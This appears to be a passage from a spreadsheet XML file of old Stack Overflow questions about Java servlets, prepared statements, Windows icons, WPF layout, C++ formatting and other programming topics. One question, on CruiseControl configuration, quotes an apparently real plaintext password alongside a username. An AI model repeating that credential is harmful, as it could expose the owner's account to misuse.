&lt;p&gt;Thanks for your help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I separate markup from application code when building a Java website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a .NET web developer who has just been asked to produce a small demo website using NetBeans IDE 5.5. I have no experience with Java up to this point.&lt;/p&gt;
&lt;p&gt;I've followed a couple of quick tutorials, one which just uses a JSP file and another which uses a servlet. My concern at this early stage is that it looks difficult to keep my application code away from my markup.&lt;/p&gt;
&lt;p&gt;Using JSP files looks quite similar to the old days of classic ASP. On the other hand, servlets look useful but seem to involve a lot of writing out markup to the output stream, which I'm not happy with either.&lt;/p&gt;
&lt;p&gt;Is there an equivalent to the ASP .NET code-behind model, or any other strategies for separating out markup and code? Is it possible to keep markup in the JSP and then use the servlet from the JSP?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL exception when trying make an prepared statement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to pass the following &lt;code&gt;String&lt;/code&gt; to a &lt;code&gt;PreparedStatement&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private static final String QUICK_SEARCH = "select * from c where NAME like '% ? %'";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I get an SQL exception that the bind variable is missing.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find the default icons used for folders and applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to load the default HICON that explorer displays for:  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An open folder&lt;/li&gt;
&lt;li&gt;An exe that has no embedded default icon of its own. This can also be seen in 'Add/Remove Programs' or 'Programs and Features' as it's called on Vista.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Do you know where these can be found? I think the folder icon might be in the resources of explorer.exe. But have no idea where the default application icon can be retrieved from.&lt;/p&gt;
&lt;p&gt;And additionally, do you have any sample code that could load them into HICONs.&lt;/p&gt;
&lt;p&gt;I really need this to work on multiple Windows OSs: 2000, XP, Vista, 2008&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Thanks for the help so far. I'm on Vista and have looked through Shell32.dll. I don't see an icon in there that looks the same as the default one displayed by an application in explorer. I could be missing it - there are 278 icons to look through - is it definitely in there, or is there some other location I should look?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Uploading data into remote database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the most secure and easier way to send approx. 1000 different records into database that is not directly accessible - MySQL database on Web provider's server - using Windows application 
.
Data will be stored into different tables.&lt;/p&gt;
&lt;p&gt;Edited:
The application will be distributed to users who have no idea what is database or putty or... They just install my application, open it, enter some data and press Submit.&lt;/p&gt;
&lt;p&gt;Currently I'm using php to upload the generated script into webserver and there process it. I think I should also include some signature to the file to avoid some "drop..." hacks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mysterious EOF exception while reading a file with Java IO functions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I got following exception when I am trying to seek to some file. &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&gt;
  Error while seeking to 38128 in myFile, File length: 85742
  java.io.EOFException
      at java.io.RandomAccessFile.readInt(RandomAccessFile.java:725)
      at java.io.RandomAccessFile.readLong(RandomAccessFile.java:758)
  &gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;But If you see I am trying to seek to '38128' where as file length is '85742'. It reported EOF exception. I wonder how it is possible? Another process appends contents to that file periodically and closes the file handler. It appends contents using DataOutputStream. My process is trying to seek to some locations and reading it. One more thing is I got this exception only once. I tried to reproduce it but it never happened again. The file is in local disk only. No filer.&lt;/p&gt;
&lt;p&gt;Thanks
D. L. Kumar&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to center a mask in a Panel when rendering</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple scenario where a panel needs a masked loading indicator over it while its loading the content. I have the mask working fine using the following code but the loading indicator appears at the top when calling it the first time. When calling it after the panel is shown, ie. on a button event, the mask appears correctly in the center of the panel. Any ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var pnl = new Ext.Panel({
    title: 'test',
    width: 500,
    height: 500,
    renderTo: 'controls',
    listeners: {
        render: function(comp) {
            comp.load();
        }
    },
    load: function() {
       this.el.mask('loading...', 'loadingMask');
    }
});
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Need technology recommendation/suggestion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We (my company) is trying to develop a solution (application) for document management.
We have considered using MS Sharepoint Server 2007 or Sharepoint Services, but we need recommendation or suggestion for this.&lt;/p&gt;
&lt;p&gt;We are planning to use windows workflow fundation for various tasks like(task assignment, document approval, information collection...). But we need suggestion on which product to choose, and/or witch technology.&lt;/p&gt;
&lt;p&gt;example:
The user logs on a web portal to request a house building permit. He enters the required information in a form and submits the request. The request is then assigned to different persons or departments, depending in which stadium the request currently is. The user can anytime logs on to the web portal and see the state of his request and if required to enter some different information. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>c# Read line from PDF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to be able to read line by line from a pdf, compare it to a string( a filename), and if the string appears in that line, write that line to a list.&lt;/p&gt;
&lt;p&gt;So far I had a quick look at ITextSharp and at PDFSharp, but it doesn't seem like these are the right tools for the job as they focus most on altering and printing pdfs.&lt;/p&gt;
&lt;p&gt;Does anyone know another way of reading lines from a pdf, or should I keep trying with ITextSharp &amp;amp; PDFSharp?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a maximum number you can set Xmx to when trying to increase jvm memory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a max. size you can set Xmx to? I set it to 1024m and eclipse opens ok. When I set it above 1024, eclipse doesn't open and I get the error "jvm terminated. Exit code=-1"...&lt;/p&gt;
&lt;p&gt;I was doing this because I keep getting an "java.lang.OutOfMemoryError: Java heap space". I am reading in a 35.5Mb .txt file and this error occurs when it's just reading in the file using the "&lt;code&gt;while((line = reader.readLine()) != null)&lt;/code&gt;" loop. I would have thought that 1024mb would have been enough. Can anyone help me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are Transactions allowed by default in SQLServer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to use DbTransactions (on a single db) but I am not sure about how to make sure it will keep working when I deploy to the production environment.&lt;/p&gt;
&lt;p&gt;What are the requirements for an application to be able to use SQL DbTransactions?
Are they allowed by default in SQLServer (and what's the deal with MSDTC)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to express the content referenced by the anchor tag</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to express in an HTML document what kind of document is pointed by an anchor tag (&lt;code&gt;&amp;lt;a&amp;gt;&lt;/code&gt;). For example, is it a list of dates, or a list of people, etc... All referenced documents will be Atom feeds, but the links will be displayed differently based on what the feed contains.&lt;/p&gt;
&lt;p&gt;I see 2 options :&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;using the "rel" attribute :&lt;/strong&gt; this attribute is supposed to contains the &lt;em&gt;relation&lt;/em&gt; between the current document and the referenced document. I don't think this is an optimal solution as this attribute is supposed to define the relation and not really the content. The referenced document will be a list of dates for all documents referencing it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;using the "type" attribute :&lt;/strong&gt; this attribute is supposed to contains the content type of the referenced document. This solution seems closer to what I try to achieve, but this attribute should contains a content type and not a more generic description of the link.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Which solution would you recommend ? Do you see a cleaner way to achieve the same result ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Persistence solutions for C++ (with a SQL database)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering what kind of persistence solutions are there for C++ with a SQL database? In addition to doing things with custom SQL (and encapsulating the data access to DAOs or something similar), are there some other (more general) solutions?&lt;/p&gt;
&lt;p&gt;Like some general libraries or frameworks (something like Hibernate &amp;amp; co for Java and .NET) or something else? (Something that I haven't even thought of can also be welcome to be suggested)&lt;/p&gt;
&lt;p&gt;EDIT: Yep, I was searching more for an ORM solution or something similar to handle sql queries and the relationships between tables and objects than for the db engine itself. Thanks for all the answers anyway!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET - Trust Level = Full?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently joined a firm and when analyzing their environment I noticed that the SharePoint web.config had the trust level set to Full.  I know this is an absolutely terrible practice and was hoping the stackoverflow community could help me outline the flaws in this decision.  &lt;/p&gt;
&lt;p&gt;Oh, it appears this decision was made to allow the developers to deploy dlls to the Bin folder without creating CAS policies.  Sigh.&lt;/p&gt;
&lt;p&gt;Just want to clarify and make matters worse, we are also deploying third party code to this web application.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding out who is listening for PropertyChangedEventHandler in c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a WPF form and I am working with databinding. I get the events raised from INotifyPropertyChanged, but I want to see how to get a list of what items are listening, which i fire up the connected handler.&lt;/p&gt;
&lt;p&gt;How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatic configuration reinitialization in Spring</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Log4j, there is a feature wherein the system can be initialized to do a configure and watch with an interval. This allows for the log4j system to reload its properties whenever the property file is changed. Does the spring framework have such a Configuration Observer facility wherein the Configuration is reloaded when it changed. The Configuration that needs reloading is not the Springs's applicationContext.xml but  various other configuration files that are initialized using the Spring initialization beans.
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OracleDataReader loses results after examination</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have come across a quirky "feature" in Visual Studio and I was interested in seeing if anyone else had noticed this. Or if it is specific to myself.&lt;/p&gt;
&lt;p&gt;I have some methods that perform SQL queries on a database and then return an OracleDataReader&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;method()
{
OracleCommand cmd = new command(query, connection);
OracleDataReader r = cmd.ExecuteReader();
return r;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I am debugging the code that uses this method.
I can click on the non public members to view the rows in the results.
However once I have viewed these results trying to perform a reader.Read() on the OracleDataReader does not contain any results. Checking the results in the debugger view shows the reader as Empty.&lt;/p&gt;
&lt;p&gt;Any time I do not check the results, the code that executes Read works without any problems.&lt;/p&gt;
&lt;p&gt;I've not found evidence of this via Google, but my search skills often leave a lot to be desired. If anyone could confirm this on a system of their own or shed some light on the causes I would greatly appreciate it.&lt;/p&gt;
&lt;p&gt;Thanks very much.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>cruisecontrol config.xml special characters svnbootstrapper</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a line like : &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;svnbootstrapper LocalWorkingCopy="${projects.dir}/${project.name}" Password="4udr=qudafe$h$&amp;amp;e4Rub" Username="televic-education" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in my config.xml. Because of special characters in the Password cruisecontrol service won't start. Is there a way to solve this?&lt;/p&gt;
&lt;p&gt;Maybe with setting a property? Or escaping characters?&lt;/p&gt;
&lt;p&gt;thx, Lieven Cardoen&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multiple submit buttons/forms in Rails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a rails application which lets you go to a certain page, say /person/:id. On this page it shows a set of available resources. I want each resource to have a button next to it, which reserves that resource to that person (by creating a new instance of an Allocation model.) As an extension, I'd like several buttons by each resource, that cancel reservations and do other things. I'd also like to input data alongside some of the buttons, e.g. to allocate some % of a resource.&lt;/p&gt;
&lt;p&gt;My problem is I can't work out how to sensibly do this without repeating myself, or having a very hacky controller. How can I do this without matching on the value part of the submit buttons (the text on the buttons), or using any javascript?&lt;/p&gt;
&lt;p&gt;Additionally, if you have two forms on a page, how do you set it up so changes on both forms are saved when any submit button is clicked?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you convert the output of php crypt() to valid MD5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some strings that have been encrypted using the &lt;a href="http://php.net/crypt" rel="nofollow"&gt;PHP function &lt;code&gt;crypt()&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The outputs look something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$1$Vf/.4.1.$CgCo33ebiHVuFhpwS.kMI0
$1$84..vD4.$Ps1PdaLWRoaiWDKCfjLyV1
$1$or1.RY4.$v3xo04v1yfB7JxDj1sC/J/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;While I believe crypt() is using the MD5 algorithm, the outputs are not valid MD5 hashes.&lt;/p&gt;
&lt;p&gt;Is there a way of converting the produced hashes into valid MD5 hashes (16-byte hex values)?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;Update:&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Thanks for the replies so answers so far.  I'm pretty sure the crypt function used is using some sort of MD5 algorithm.  What I'm looking to do is convert the ouput that I have into an MD5 hash that looks something like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;9e107d9d372bb6826bd81d3542a419d6  
e4d909c290d0fb1ca068ffaddf22cbd0  
d41d8cd98f00b204e9800998ecf8427e
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;(taken from &lt;a href="http://en.wikipedia.org/wiki/MD5" rel="nofollow"&gt;Wikipedia&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Is there a way of converting from the hashes I have to ones like the above?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>copy Word document contents without using clipboard (VBA)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering how to avoid using Windows clipboard, when you want to "replicate" multiple sections of a Word document (using VBA in macros)&lt;/p&gt;
&lt;p&gt;Why to avoid? Because we're using Word on a server, in a multiuser environment (I know that it is officially frowned upon)&lt;/p&gt;
&lt;p&gt;Otherwise, this would be easily accomplished with Selection.Copy and Selection.Paste methods.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Internet Explorer CSS Line Height For MusiSync Font</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use the MusiSync font to embed a sharp and flat symbol in a line of text. In order to keep these symbols from being tiny I have to make their point size twice the size of the rest of the text. Unfortunately, this messes up the line height in Internet Explorer and I cannot find a way to control it. You can download the MusiSync font at:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.icogitate.com/~ergosum/fonts/musicfonts.htm" rel="nofollow"&gt;http://www.icogitate.com/~ergosum/fonts/musicfonts.htm&lt;/a&gt; &lt;/p&gt;
&lt;p&gt;My attempt to use this font in a web page can be found at:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.williamsportwebdeveloper.com/MusiSync.htm" rel="nofollow"&gt;http://www.williamsportwebdeveloper.com/MusiSync.htm&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Selecting an index in a QListView</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This might be a stupid question, but I can't for the life of me figure out how to select the row of a given index in a QListView.&lt;/p&gt;
&lt;p&gt;QAbstractItemView , QListView's parent has a setCurrentIndex(const QModelIndex &amp;amp;index). The problem is, I can't construct a QModelIndex with the row number I want since the row and column field of the QModelIndex has no mutators.&lt;/p&gt;
&lt;p&gt;QTableView, which also inherits from QAbstractItemView has a selectRow(int row) function, why in the seven hells doesn't the QListView have this?&lt;/p&gt;
&lt;p&gt;Good ol' windows forms has the SelectedIndex property on it's listviews.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a method in PL/SQL to convert/encode text to XML compliant text?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a colleague who needs to convert text from a PL/SQL method into XML compliant text, as he is constructing a excel spreadsheet by updating a text template.&lt;/p&gt;
&lt;p&gt;Is there a method in PL/SQL to convert/encode text to XML compliant text?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bash script to create symbolic links to shared libraries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think this question is rather easy for you shell scripting monsters.&lt;/p&gt;
&lt;p&gt;I am looking for the most elegant and shortest way to create symbolic links to shared libraries for Unix by means of a bash shell script.&lt;/p&gt;
&lt;p&gt;What I need is starting out with a list of shared library files such as "libmythings.so.1.1, libotherthings.so.5.11", get the symbolic links created such as: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;libmythings.so -&amp;gt; libmythings.so.1 -&amp;gt; libmythings.so.1.1
libotherthings.so -&amp;gt; libotherthings.so.5 -&amp;gt; libotherthings.so.5.11
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The library files are inside a directory which contains other files such as other shell scripts.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: Well, "ldconfig -nN ." could work OK, but I also need the link without the major number of the library appended after ".so", at least one of the libraries, since one or more libraries are the entry points of JNI calls from Java, so when a library is instanced by means of System.loadlibrary("libraryname") it expects a library called "libraryname.so", not "libraryname.so.X". &lt;/p&gt;
&lt;p&gt;The solution with just ldconfig -nN could work if there were a workaround for the Java part.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Acquiring drive names (as opposed to drive letters) in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On my Windows machine, my main hard drive has the letter C: and the name "Local disk". &lt;/p&gt;
&lt;p&gt;To list the drive letters in Java on Windows, the File object has the static listRoots() method. But I can't find a way to acquire the drive names (as opposed to the drive letters) on Windows.&lt;/p&gt;
&lt;p&gt;Has anyone tried this before?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VB6: List available commands, then execute a random one of them</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hallo!
I'm a n00b, and I'm looking for a few lines of code in VB6 to implement this:
I want to list a certain number of commands to execute, then tell my program to chose a random one among them and execute it: strictly speaking, I'm dealing with a MSAgent character, and I want him to make a face every 5 minutes.
How can I achieve this, please?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Launching a C++ executable from a C# app and keeping role based security context</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First off I know this is probably a tall order but... :)&lt;/p&gt;
&lt;p&gt;We have some software that interacts with the hardware our company produces. This software loads a .NET assembly and this acts as our interface to the hardware. &lt;/p&gt;
&lt;p&gt;Currently we have a 'Launcher' application written in C# which provides role based security. This 'Launcher' launches the C++ executable with command line arguments (the .NET assembly to use) via a process. The C++ executable then loads the supplied .NET assembly and uses it to perform its actions.&lt;/p&gt;
&lt;p&gt;The problem is because I launch the C++ application in a process I lose the role based security context provided by the 'Launcher'.&lt;/p&gt;
&lt;p&gt;Is there any way I can launch the C++ application and keep the role based security context?&lt;/p&gt;
&lt;p&gt;Thanks for taking the time to read this. If you have any questions please let me know.&lt;/p&gt;
&lt;p&gt;Thank you,&lt;/p&gt;
&lt;p&gt;Adam &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why doesn't C++ have a pointer to member function type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I could be totally wrong here, but as I understand it, C++ doesn't really have a native "pointer to member function" type.  I know you can do tricks with Boost and mem_fun etc. But why did the designers of C++ decide not to have a 64-bit pointer containing a pointer to the function and a pointer to the object, for example?&lt;/p&gt;
&lt;p&gt;What I mean specifically is a pointer to a member function of a &lt;em&gt;particular&lt;/em&gt; object of &lt;em&gt;unknown type&lt;/em&gt;.  I.E. something you can use for a &lt;strong&gt;callback&lt;/strong&gt;.  This would be a type which contains &lt;em&gt;two&lt;/em&gt; values. The first value being a pointer to the &lt;em&gt;function&lt;/em&gt;, and the second value being a pointer to the &lt;em&gt;specific instance&lt;/em&gt; of the object.&lt;/p&gt;
&lt;p&gt;What I do not mean is a pointer to a general member function of a class. E.G.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int (Fred::*)(char,float)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It would have been so useful and made my life easier.&lt;/p&gt;
&lt;p&gt;Hugo&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get File Icon used by Shell</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .Net (C# or VB: don't care), given a file path string, FileInfo struct, or FileSystemInfo struct for a real existing file, how can I determine the icon(s) used by the shell (explorer) for that file?&lt;/p&gt;
&lt;p&gt;I'm not currently planning to use this for anything, but I became curious about how to do it when looking at &lt;a href="http://stackoverflow.com/questions/462232/what-is-the-best-vb-net-control-standard-custom-for-displaying-list-of-files"&gt;this question&lt;/a&gt; and I thought it would be useful to have archived here on SO.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Window-overflowing widget in wxWidgets</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to implement this design in wxPython on Linux...&lt;br /&gt;
I have a toolbar with a button, when the button is pressed a popup should appear, mimicking an extension of the toolbar (like a menu), and this popup should show two columns of radio buttons (say 2x5) and a text box...
My main problem is that the toolbar is small in height, so the popup has to overflow the bounds of the window/client area..&lt;/p&gt;
&lt;p&gt;I thought of two possible implementations:  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;by using a wxMenu, since a menu &lt;em&gt;can&lt;/em&gt; be drawn outside the client area. I fear that the layout possibilities aren't flexible enough for my goal&lt;/li&gt;
&lt;li&gt;by using a shaped frame. Pressing the button would re-shape the frame and draw the needed widgets as requested.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;My question is: am I missing something / wrong on something? :) Is this doable at all?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Page refreshing after the parameter selection in SSRS report</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have couple of parameters in my SSRS report. some are multivalued and some are regular with drop down list. each time while selecting a different parameter value the page is getting refreshed. Is there any way to avoid this  page refreshment on each parameter selection.&lt;/p&gt;
&lt;p&gt;Thanks in advance. 
Maria&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to stretch in width a WPF user control to its window?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Window with my user control and I would like to make usercontrol width equals window width. How to do that?&lt;/p&gt;
&lt;p&gt;The user control is a horizontal menu and contains a grid with three columns:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ColumnDefinition Name="LeftSideMenu" Width="433"/&amp;gt;
&amp;lt;ColumnDefinition Name="Middle" Width="*"/&amp;gt;
&amp;lt;ColumnDefinition Name="RightSideMenu" Width="90"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That is the reason I want the window width, to stretch the user control to 100% width, with the second column relative.&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;I am using a grid, there is the code for Window:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Window x:Class="TCI.Indexer.UI.Operacao"
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:tci="clr-namespace:TCI.Indexer.UI.Controles"
    Title=" " MinHeight="550" MinWidth="675" Loaded="Load" ResizeMode="NoResize" WindowStyle="None" WindowStartupLocation="CenterScreen" WindowState="Maximized" Focusable="True"
    x:Name="windowOperacao"&amp;gt;
    &amp;lt;Canvas x:Name="canv"&amp;gt;
        &amp;lt;Grid&amp;gt;
            &amp;lt;tci:Status x:Name="ucStatus"/&amp;gt; &amp;lt;!-- the control which I want to stretch in width --&amp;gt;
        &amp;lt;/Grid&amp;gt;
    &amp;lt;/Canvas&amp;gt;
&amp;lt;/Window&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Version of XSLT in iPhone</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I plan to use XML/XSLT in my iPhone application. &lt;/p&gt;
&lt;p&gt;What version of XSLT is currently supported on the iPhone? Can I use XSLT 2.0 or just 1.0 ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I get the matrix determinant using Numpy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I read in the manual of Numpy that there is function &lt;code&gt;det(M)&lt;/code&gt; that can calculate the determinant. However, I can't find the &lt;code&gt;det()&lt;/code&gt; method in Numpy.&lt;/p&gt;
&lt;p&gt;By the way, I use Python 2.5. There should be no compatibility problems with Numpy.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>String.Format for C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Looking for an implementation for C++ of a function like .NET's String.Format.  Obviously there is printf and it's varieties, but I'm looking for something that is positional as in:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;String.Format("Hi there {0}.  You are
  {1} years old.  How does it feel to be
  {1}?", name, age);&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is needed because we're going to try and make it easier to localize our app, and giving the translators {0} and {1} to position anywhere in the sentence is much easier than giving them a %s, %d, %d which must be positioned in that order in their translation.&lt;/p&gt;
&lt;p&gt;I suppose search and replace with variable inputs (va_start, va_end, etc) is what I'll end up building, but if there is already a solid solution, that would be preferrable.&lt;/p&gt;
&lt;p&gt;Thanks :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tiny flash in safari - very strange bug!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a flash file that in every other browser displays at its correct size (which is something like 1600px) however, in safari it appears tiny.  We have also noticed that sometimes when the flash file is not cached it appears at normal size, then after a soft refresh the flash goes tiny again.&lt;/p&gt;
&lt;p&gt;We are using mootools to include the flash but I've also tried just using flash's HTML/Javascript with the publish function, we still have the same problem with it being tiny in safari.&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas as to what this could be?&lt;/p&gt;
&lt;p&gt;Thanks
Tom&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to optimize dataset that contains linestrings. Some lines start and end at same coordinates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;THE SETUP&lt;/strong&gt;&lt;br /&gt;
I have a table which contains linestrings. Linestrings are made up of multiple geographic points. Each point is made up of a latitude and longitude. Note: the linestring value is stored as TEXT in the database.&lt;/p&gt;
&lt;p&gt;So one row in the table might look like this:&lt;br /&gt;
id: an integer&lt;br /&gt;
linestring: x1, y2, x2, y2, x3, y3, x4, y4&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;THE PROBLEM&lt;/strong&gt;&lt;br /&gt;
Google Maps only allows up to 1000 elements to be displayed at a time. In my case, I'm displaying 850 linestrings and will need to add many more in the future.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;THE QUESTION&lt;/strong&gt;&lt;br /&gt;
Quite a few of the linestrings connect with one or more other linestrings, meaning that they start and/or end at the same coordinates. What I'd look to do is find the best way to optimize the dataset so linestrings which connect at the ends are merged in the DB table. This will reduce the total element count when I parse the DB table and create the display file for google maps.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EXAMPLE&lt;/strong&gt;&lt;br /&gt;
In this example, imagine, the alpha (A,B,C) values represent geographic points. The unoptimized table might look like this:&lt;/p&gt;
&lt;p&gt;before optimization:&lt;br /&gt;
&lt;strong&gt;id  linestring&lt;/strong&gt;&lt;br /&gt;
1 A, B, C&lt;br /&gt;
2 C, D&lt;br /&gt;
3 B, A&lt;br /&gt;
4 F, G, H&lt;br /&gt;
5 G, I&lt;br /&gt;
6 H, J
&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;After optimization:&lt;br /&gt;
1 A, B, C, D&lt;br /&gt;
2 F, G, H, J&lt;br /&gt;
3 G, I&lt;br /&gt;
&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;So what is the best way to optimize the data? Is there a particular algorithm which works best? I have some ideas for solutions which I will formulate and add, but they seem verbose and convulated.&lt;/p&gt;
&lt;p&gt;I am not a CS major so excuse the sloppy terminology and let me know if clarification is needed anywhere. Thanks!
&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;FYI.. I am using a MySQL DB. I am not using the spatial extensions. If you have an embarrassingly simple solution that uses the spatial extensions I would love to hear about it anyway.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Checkstyle for ActionScript (Flex)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;HI,
I'm currently working on a project that uses Flex and Java. In Java we easily enforced a coding standard with Checkstyle, and we want to do this for Flex.&lt;/p&gt;
&lt;p&gt;Does anybody know of a tool similar to Checkstyle that would allow coding standard checks?
(I've googled for this but found only one project written in python and it seams abandoned)&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting odd error on .net ExecuteNonQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working in .NET with SQL server on the backend&lt;/p&gt;
&lt;p&gt;I have a database that I create a record in using a web control - then I need to update some of the fields.&lt;br /&gt;
I can trap the sql statement and run it in sql server successfully - however, when I try to run execute non-query I get the following error: &lt;/p&gt;
&lt;p&gt;Unhandled Execution Error 
Incorrect syntax near '&amp;lt;'.
